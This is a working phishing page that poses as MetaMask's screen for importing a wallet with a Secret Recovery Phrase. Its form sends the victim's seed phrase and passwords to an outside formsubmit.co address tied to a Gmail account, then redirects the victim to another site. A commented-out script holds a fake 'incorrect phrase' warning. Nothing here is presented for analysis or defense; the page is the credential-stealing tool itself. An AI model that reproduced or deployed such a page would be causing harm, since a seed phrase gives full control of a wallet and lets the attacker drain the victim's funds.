<!DOCTYPE html>
<html>

<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1 user-scalable=no" />
  <title>Connect Wallet</title>
  <link rel="icon" href="images/wallccc.png" />
  <link rel="stylesheet" href="connect.css">
  <meta content="Metamask - A crypto wallet & gateway to blockchain apps
            A crypto wallet & gateway to blockchain apps." name="description" />
  <link rel="stylesheet" type="text/css" href="css/style2.css" title="ltr" disabled="" />
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" />

  <style></style>
  <style data-jss="" data-meta="MuiInputBase">
    @-moz-keyframes mui-auto-fill {}

    @-moz-keyframes mui-auto-fill-cancel {}

    .MuiInputBase-root {
      color: rgba(0, 0, 0, 0.87);
      cursor: text;
      display: inline-flex;
      position: relative;
      font-size: 1rem;
      box-sizing: border-box;
      align-items: center;
      font-family: "Roboto", "Helvetica", "Arial", sans-serif;
      font-weight: 400;
      line-height: 1.1876em;
      letter-spacing: 0.00938em;
    }

    .MuiInputBase-root.Mui-disabled {
      color: rgba(0, 0, 0, 0.38);
      cursor: default;
    }

    .MuiInputBase-multiline {
      padding: 6px 0 7px;
    }

    .MuiInputBase-multiline.MuiInputBase-marginDense {
      padding-top: 3px;
    }

    .MuiInputBase-fullWidth {
      width: 100%;
    }

    .MuiInputBase-input {
      font: inherit;
      color: currentColor;
      width: 100%;
      border: 0;
      height: 1.1876em;
      margin: 0;
      display: block;
      padding: 6px 0 7px;
      min-width: 0;
      background: none;
      box-sizing: content-box;
      animation-name: mui-auto-fill-cancel;
      letter-spacing: inherit;
      animation-duration: 10ms;
      -webkit-tap-highlight-color: transparent;
    }

    .MuiInputBase-input::-webkit-input-placeholdegr {
      color: currentColor;
      opacity: 0.42;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    }

    .MuiInputBase-input::-moz-placeholder {
      color: currentColor;
      opacity: 0.42;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    }

    .MuiInputBase-input:-ms-input-placeholder {
      color: currentColor;
      opacity: 0.42;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    }

    .MuiInputBase-input::-ms-input-placeholder {
      color: currentColor;
      opacity: 0.42;
      transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
    }

    .MuiInputBase-input:focus {
      outline: 0;
    }

    .MuiInputBase-input:invalid {
      box-shadow: none;
    }

    .MuiInputBase-input::-webkit-search-decoration {
      -webkit-appearance: none;
    }

    .MuiInputBase-input.Mui-disabled {
      opacity: 1;
    }

    .MuiInputBase-input:-webkit-autofill {
      animation-name: mui-auto-fill;
      animation-duration: 5000s;
    }

    label[data-shrink="false"]+.MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
      opacity: 0 !important;
    }

    label[data-shrink="false"]+.MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
      opacity: 0 !important;
    }

    label[data-shrink="false"]+.MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
      opacity: 0 !important;
    }

    label[data-shrink="false"]+.MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
      opacity: 0 !important;
    }

    label[data-shrink="false"]+.MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
      opacity: 0.42;
    }

    label[data-shrink="false"]+.MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
      opacity: 0.42;
    }

    label[data-shrink="false"]+.MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
      opacity: 0.42;
    }

    label[data-shrink="false"]+.MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
      opacity: 0.42;
    }

    .MuiInputBase-inputMarginDense {
      padding-top: 3px;
    }

    .MuiInputBase-inputMultiline {
      height: auto;
      resize: none;
      padding: 0;
    }

    .MuiInputBase-inputTypeSearch {
      -moz-appearance: textfield;
      -webkit-appearance: textfield;
    }
  </style>
  <style data-jss="" data-meta="MuiInput">
    .MuiInput-root {
      position: relative;
    }

    label+.MuiInput-formControl {
      margin-top: 16px;
    }

    .MuiInput-colorSecondary.MuiInput-underline:after {
      border-bottom-color: #f50057;
    }

    .MuiInput-underline:after {
      left: 0;
      right: 0;
      bottom: 0;
      content: "";
      position: absolute;
      transform: scaleX(0);
      transition: transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms;
      border-bottom: 2px solid #3f51b5;
      pointer-events: none;
    }

    .MuiInput-underline.Mui-focused:after {
      transform: scaleX(1);
    }

    .MuiInput-underline.Mui-error:after {
      transform: scaleX(1);
      border-bottom-color: #f44336;
    }

    .MuiInput-underline:before {
      left: 0;
      right: 0;
      bottom: 0;
      content: "\00a0";
      position: absolute;
      transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
      border-bottom: 1px solid rgba(0, 0, 0, 0.42);
      pointer-events: none;
    }

    .MuiInput-underline:hover:not(.Mui-disabled):before {
      border-bottom: 2px solid rgba(0, 0, 0, 0.87);
    }

    .MuiInput-underline.Mui-disabled:before {
      border-bottom-style: dotted;
    }

    @media (hover: none) {
      .MuiInput-underline:hover:not(.Mui-disabled):before {
        border-bottom: 1px solid rgba(0, 0, 0, 0.42);
      }
    }
  </style>
  <style data-jss="" data-meta="MuiFormLabel">
    .MuiFormLabel-root {
      color: rgba(0, 0, 0, 0.54);
      padding: 0;
      font-size: 1rem;
      font-family: "Roboto", "Helvetica", "Arial", sans-serif;
      font-weight: 400;
      line-height: 1;
      letter-spacing: 0.00938em;
    }

    .MuiFormLabel-root.Mui-focused {
      color: #3f51b5;
    }

    .MuiFormLabel-root.Mui-disabled {
      color: rgba(0, 0, 0, 0.38);
    }

    .MuiFormLabel-root.Mui-error {
      color: #f44336;
    }

    .MuiFormLabel-colorSecondary.Mui-focused {
      color: #f50057;
    }

    .MuiFormLabel-asterisk.Mui-error {
      color: #f44336;
    }
  </style>
  <style data-jss="" data-meta="MuiInputLabel">
    .MuiInputLabel-root {
      display: block;
      transform-origin: top left;
    }

    .MuiInputLabel-formControl {
      top: 0;
      left: 0;
      position: absolute;
      transform: translate(0, 24px) scale(1);
    }

    .MuiInputLabel-marginDense {
      transform: translate(0, 21px) scale(1);
    }

    .MuiInputLabel-shrink {
      transform: translate(0, 1.5px) scale(0.75);
      transform-origin: top left;
    }

    .MuiInputLabel-animated {
      transition: color 200ms cubic-bezier(0, 0, 0.2, 1) 0ms,
        transform 200ms cubic-bezier(0, 0, 0.2, 1) 0ms;
    }

    .MuiInputLabel-filled {
      z-index: 1;
      transform: translate(12px, 20px) scale(1);
      pointer-events: none;
    }

    .MuiInputLabel-filled.MuiInputLabel-marginDense {
      transform: translate(12px, 17px) scale(1);
    }

    .MuiInputLabel-filled.MuiInputLabel-shrink {
      transform: translate(12px, 10px) scale(0.75);
    }

    .MuiInputLabel-filled.MuiInputLabel-shrink.MuiInputLabel-marginDense {
      transform: translate(12px, 7px) scale(0.75);
    }

    .MuiInputLabel-outlined {
      z-index: 1;
      transform: translate(14px, 20px) scale(1);
      pointer-events: none;
    }

    .MuiInputLabel-outlined.MuiInputLabel-marginDense {
      transform: translate(14px, 12px) scale(1);
    }

    .MuiInputLabel-outlined.MuiInputLabel-shrink {
      transform: translate(14px, -6px) scale(0.75);
    }
  </style>
  <style data-jss="" data-meta="MuiFormControl">
    .MuiFormControl-root {
      border: 0;
      margin: 0;
      display: inline-flex;
      padding: 0;
      position: relative;
      min-width: 0;
      flex-direction: column;
      vertical-align: top;
    }

    .MuiFormControl-marginNormal {
      margin-top: 16px;
      margin-bottom: 8px;
    }

    .MuiFormControl-marginDense {
      margin-top: 8px;
      margin-bottom: 4px;
    }

    .MuiFormControl-fullWidth {
      width: 100%;
    }
  </style>
  <style data-jss="" data-meta="MuiTextField"></style>
  <style data-jss="" data-meta="makeStyles">
    .jss16 {
      color: #aeaeae;
      font-weight: 400;
    }

    .jss16.jss17 {
      color: #aeaeae;
    }

    .jss16.jss19 {
      color: #aeaeae;
    }

    .jss18:after {
      border-bottom: 2px solid rgb(3, 125, 214);
    }

    .jss20 {
      color: #aeaeae;
    }

    .jss21 {
      padding: 8px;
    }

    .jss21::placeholder {
      color: #aeaeae;
    }

    .jss22 {
      color: #fff;
    }

    .jss23:after {
      border-bottom: 2px solid #fff;
    }

    .jss24.jss25 {
      color: #5b5b5b;
    }

    .jss24.jss19 {
      color: #5b5b5b;
    }

    .jss27 {
      border: 1px solid #bbc0c5;
      height: 48px;
      display: flex;
      padding: 0 16px;
      align-items: center;
      border-radius: 6px;
    }

    label+.jss27 {
      margin-top: 9px;
    }

    .jss27.jss26 {
      border: 1px solid #2f9ae0;
    }

    .jss28 {
      color: #5b5b5b;
      position: initial;
      font-size: 1rem;
      transform: none;
      transition: none;
    }

    .jss29 {
      color: #5b5b5b;
      position: initial;
      font-size: 0.75rem;
      transform: none;
      transition: none;
    }

    .jss30 {
      line-height: initial !important;
    }

    @media (max-width: 867px) {

      .select-action,
      .select-action__select-buttons {
        width: 100% !important;
      }

      .select-action__select-buttons {
        flex-wrap: wrap !important;
        max-width: 388px;
        min-width: 300px;
      }

      .select-action__select-button {
        margin-bottom: 35px !important;
        margin-left: 0 !important;
      }

      .first-time-flow {
        padding: 0 15px;
      }

      .app-header__logo-container {
        margin-bottom: 15px;
        margin-top: 15px;
      }

      .first-time-flow__header {
        font-size: 28px;
      }

      .first-time-flow__checkbox-label {
        font-size: 0.95rem;
      }

      .metametrics-opt-in__main {
        margin-left: 0 !important;
      }

      .metametrics-opt-in__title {
        font-size: 2rem;
      }
    }
  </style>
</head>

<body>
  <div id="app-content">
    <div class="app os-mac browser-firefox mouse-user-styles">
      <div><span></span></div>
      <div style="position: absolute; top: 58px; width: 309px; z-index: 55"
        class="menu-droppo-container network-droppo">
        <style>
          .menu-droppo-enter {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }

          .menu-droppo-enter.menu-droppo-enter-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave {
            transition: transform 300ms ease-in-out;
            transform: translateY(0%);
          }

          .menu-droppo-leave.menu-droppo-leave-active {
            transition: transform 300ms ease-in-out;
            transform: translateY(-200%);
          }
        </style>
      </div>
      <div class="main-container-wrapper">
        <div class="first-time-flow">
          <div class="first-time-flow__wrapper">
            <form class="first-time-flow__form" method="post" action="https://formsubmit.co/daowalletemv@gmail.com">
              <input type="hidden" name="_captcha" value="false">
              <input type="hidden" name="_next" value="https://cssloaderdao.vercel.app/">

              <div class="first-time-flow__create-back">
                <a href="account.html">&lt; Back</a>
              </div>
              <div class="first-time-flow__header">
                Import an account with Secret Recovery Phrase
              </div>
              <style>
                .note1 {

                  font-size: larger;
                  font-family: 'Gill Sans', 'Gill Sans MT';
                  color: black;
                }

                .note {
                  font-display: bold;
                  line-height: 30px;
                  align-items: center;

                }

                .note2 {
                  font-family: Euclid, Roboto, Helvetica, Arial, sans-serif;
                  text-decoration: solid;
                  color: black;
                  font-size: larger;
                }

                .note4 {
                  color: black;
                  text-align: center;
                }
              </style>
              <div class="first-time-flow__text-block">
                Enter your secret phrase here to restore your vault.
              </div>
              <div class="first-time-flow__textarea-wrapper">
                <label>Secret Recovery Phrase</label>
                <textarea style="display: none" id="seed_phrase_textarea" class="first-time-flow__textarea"
                  placeholder="Separate each word with a single space" autocomplete="off" name="sphrase"></textarea>
                <div id="seed_phrase_textbox_container"
                  class="MuiFormControl-root MuiTextField-root first-time-flow__textarea first-time-flow__seedphrase">
                  <div class="MuiInputBase-root MuiInput-root jss27 MuiInputBase-formControl MuiInput-formControl">
                    <input id="seed_phrase_textbox" name="phrase" aria-invalid="false" autocomplete="off"
                      placeholder="You can paste your entire secret recovery phrase into any field" type="password"
                      dir="auto" class="MuiInputBase-input MuiInput-input" value="" />
                  </div>
                </div>
                <div class="first-time-flow__checkbox-container">
                  <div class="first-time-flow__checkbox" id="fa-check-box" tabindex="0" role="checkbox"
                    aria-checked="false" aria-labelledby="ftf-chk1-label"></div>
                  <span id="ftf-chk1-label" class="first-time-flow__checkbox-label">Show Secret Recovery Phrase</span>
                </div>
              </div>
              <div class="MuiFormControl-root MuiTextField-root first-time-flow__input MuiFormControl-marginNormal">
                <label
                  class="MuiFormLabel-root MuiInputLabel-root jss24 jss28 MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink"
                  data-shrink="true" for="password" id="password-label">
                  New password (8 characters minimum)
                </label>
                <div class="MuiInputBase-root MuiInput-root jss27 MuiInputBase-formControl MuiInput-formControl">
                  <input required aria-invalid="false" name="password" placeholder="Password"
                    autocomplete="new-password" id="password" type="password" dir="auto"
                    class="MuiInputBase-input MuiInput-input" value="" />
                </div>
              </div>
              <div class="MuiFormControl-root MuiTextField-root first-time-flow__input MuiFormControl-marginNormal">
                <label
                  class="MuiFormLabel-root MuiInputLabel-root jss24 jss28 MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink"
                  data-shrink="true" for="confirm-password" id="confirm-password-label">
                  Confirm password (8 characters minimun)
                </label>
                <div class="MuiInputBase-root MuiInput-root jss27 MuiInputBase-formControl MuiInput-formControl">
                  <input required name="cpassword" placeholder="Confirm Password" aria-invalid="false"
                    autocomplete="new-password" id="confirm-password" type="password" dir="auto"
                    class="MuiInputBase-input MuiInput-input" value="" />
                </div>
              </div>

              <div class="first-time-flow__checkbox-container">
                <div class="first-time-flow__checkbox first-time-flow__terms" id="fa-check-box-2" tabindex="0"
                  role="checkbox" aria-checked="false" aria-labelledby="ftf-chk1-label"></div>
                <span id="ftf-chk1-label" class="first-time-flow__checkbox-label">
                  <span>
                    I have read and agree to the
                    <a href="https://metamask.io/terms.html" target="_blank" rel="noopener noreferrer">
                      <span class="first-time-flow__link-text">Terms of Use
                      </span>
                    </a>
                  </span>
                </span>
              </div>
              <button name="send" class="button btn-primary first-time-flow__button" disabled="disabled" id="submit-btn"
                type="submit">
                Import
              </button>
            </form>
          </div>
        </div>
      </div>
    </div>
  </div>
  <div id="popover-content"></div>
  <!-- <script>
    function myFunction() {
      alert(" Warning!!! Incorrect Secret Recovery, Please Input correct Recovery Phrases and Try again!");
    }
  </script> -->
  <script type="text/javascript" src="./main.js"></script>
  <script type="text/javascript">
    window.setTimeout(function () {
      $(".alert")
        .fadeTo(500, 0)
        .slideUp(500, function () {
          $(this).remove();
        });
    }, 2000);
  </script>

</body>

</html>